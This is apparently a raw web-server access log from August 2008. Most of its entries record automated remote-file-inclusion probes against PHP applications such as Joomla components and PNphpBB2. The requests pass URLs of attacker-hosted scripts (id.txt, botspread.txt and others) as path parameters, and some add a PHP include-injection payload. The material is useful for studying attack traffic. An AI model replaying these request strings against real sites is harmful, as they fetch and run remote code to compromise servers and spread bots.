85.25.146.28 - - [07/Aug/2008:12:48:32 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:48:33 -0700] "GET /logs/access_080312.log//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:12:48:33 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:12:48:33 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:48:33 -0700] "GET /logs/access_080312.log//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:12:48:34 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:12:48:34 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:12:48:34 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:48:35 -0700] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 18357 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:48:35 -0700] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 18373 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:48:47 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:12:48:48 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.26 - - [07/Aug/2008:12:48:50 -0700] "GET /logs/access_080220.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.26 - - [07/Aug/2008:12:48:51 -0700] "GET /logs/access_080407.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:48:53 -0700] "GET /logs/access_080227.log%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:48:57 -0700] "GET /logs/access_080123.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:49:00 -0700] "GET /logs/access_080404.log//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:49:00 -0700] "GET /logs/access_080404.log//?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.128.122.28 - - [07/Aug/2008:12:49:38 -0700] "GET /logs/access_080123.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.37.125 - - [07/Aug/2008:12:49:56 -0700] "GET /blog/wp-includes/class-pop3.php HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
88.168.106.155 - - [07/Aug/2008:12:50:06 -0700] "GET /logs/access_071202.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:50:33 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:50:33 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:50:34 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:50:34 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:12:50:38 -0700] "GET /logs//cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:12:50:38 -0700] "GET //cgi-bin//v_all/v_2007_all/2007-1//v_all/v_2006_all/b/c//e404.php?DOCUMENT_ROOT=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:50:41 -0700] "GET /logs/access_080224.log/index.php?body=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:50:41 -0700] "GET //components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:12:50:41 -0700] "GET /logs/access_080224.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:12:50:46 -0700] "GET /logs/access_080118.log//index.php?seite=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.104 - - [07/Aug/2008:12:50:57 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/trackback/ HTTP/1.0" 200 7901 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
66.79.163.142 - - [07/Aug/2008:12:51:09 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.142 - - [07/Aug/2008:12:51:09 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.142 - - [07/Aug/2008:12:51:09 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:12:51:11 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://bloggreenwood.com/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:12:51:11 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://bloggreenwood.com/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:12:51:11 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://bloggreenwood.com/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:12:53:00 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.151.242 - - [07/Aug/2008:12:53:12 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.mamolar.com/~reloj/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [07/Aug/2008:12:53:12 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.mamolar.com/~reloj/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [07/Aug/2008:12:53:13 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.mamolar.com/~reloj/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.243.103.28 - - [07/Aug/2008:12:53:14 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:53:15 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:53:15 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:53:20 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:53:21 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:53:25 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:53:26 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:12:53:36 -0700] "GET /logs/access_080211.log//addpost_newpoll.php?addpoll=preview&thispath=http://bloggreenwood.com/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:12:53:36 -0700] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://bloggreenwood.com/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:12:53:36 -0700] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://bloggreenwood.com/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.161.116.65 - - [07/Aug/2008:12:53:37 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.18.158.130 - - [07/Aug/2008:12:53:41 -0700] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_installer/template/.%20/.bash/un.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:53:48 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:53:48 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.207.103.31 - - [07/Aug/2008:12:53:51 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:53:53 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
201.253.163.149 - - [07/Aug/2008:12:53:53 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:53:53 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:53:54 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:53:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:53:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:53:58 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:53:59 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:12:54:09 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://bloggreenwood.com/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:12:54:42 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:12:54:42 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [07/Aug/2008:12:54:43 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.68.149.61 - - [07/Aug/2008:12:54:46 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 306944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:12:54:51 -0700] "GET /logs/access_080131.log/components/com_extcalendar/index.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:12:54:54 -0700] "GET /logs/access_080131.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.255.255.54 - - [07/Aug/2008:12:54:56 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 585838 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:12:55:05 -0700] "GET /logs/access_080110.log/components/com_extcalendar/index.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:12:55:05 -0700] "GET /logs/access_080110.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.151.242 - - [07/Aug/2008:12:55:07 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.mamolar.com/~reloj/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.56.255.14 - - [07/Aug/2008:12:55:40 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:12:56:00 -0700] "GET /logs/access_080318.log/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.125 - - [07/Aug/2008:12:56:02 -0700] "GET /blog/wp-content/uploads/?M=A HTTP/1.0" 200 3057 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
66.224.152.230 - - [07/Aug/2008:12:56:02 -0700] "GET /index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 200 5829 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:12:56:03 -0700] "GET /logs/index.php?view=page&pagename=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:56:14 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:56:19 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/id.txt?? HTTP/1.0" 200 18507 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.184.103 - - [07/Aug/2008:12:56:29 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.geocities.com/maros_cool/botspread.txt?? HTTP/1.1" 200 18537 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:56:30 -0700] "GET /logs/index.php?inc=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:56:30 -0700] "GET /logs/access.log/index.php?inc=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:56:34 -0700] "GET /index.php?inc=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 18439 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:12:56:43 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dogshop.at/poll/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
194.79.75.195 - - [07/Aug/2008:12:56:43 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dogshop.at/poll/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
88.214.192.29 - - [07/Aug/2008:12:56:43 -0700] "GET /logs/access_080212.log//addpost_newpoll.php?addpoll=preview&thispath=http://bloggreenwood.com/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.60.155.3 - - [07/Aug/2008:12:56:44 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
211.60.155.3 - - [07/Aug/2008:12:56:45 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:56:50 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:56:51 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:12:56:51 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:12:57:03 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:12:57:04 -0700] "GET /logs/access_080201.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:12:57:04 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:12:57:05 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:12:57:05 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:12:57:05 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:57:09 -0700] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 18373 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:12:57:09 -0700] "GET //?p=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 200 18373 "-" "libwww-perl/5.79" "www.dmulk.com"
201.253.163.149 - - [07/Aug/2008:12:57:18 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
213.134.125.46 - - [07/Aug/2008:12:57:42 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:57:56 -0700] "GET /logs/access_080209.log/index.php?show=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:57:56 -0700] "GET /logs/index.php?show=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:12:57:59 -0700] "GET /index.php?show=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 54544 "-" "libwww-perl/5.805" "www.dmulk.com"
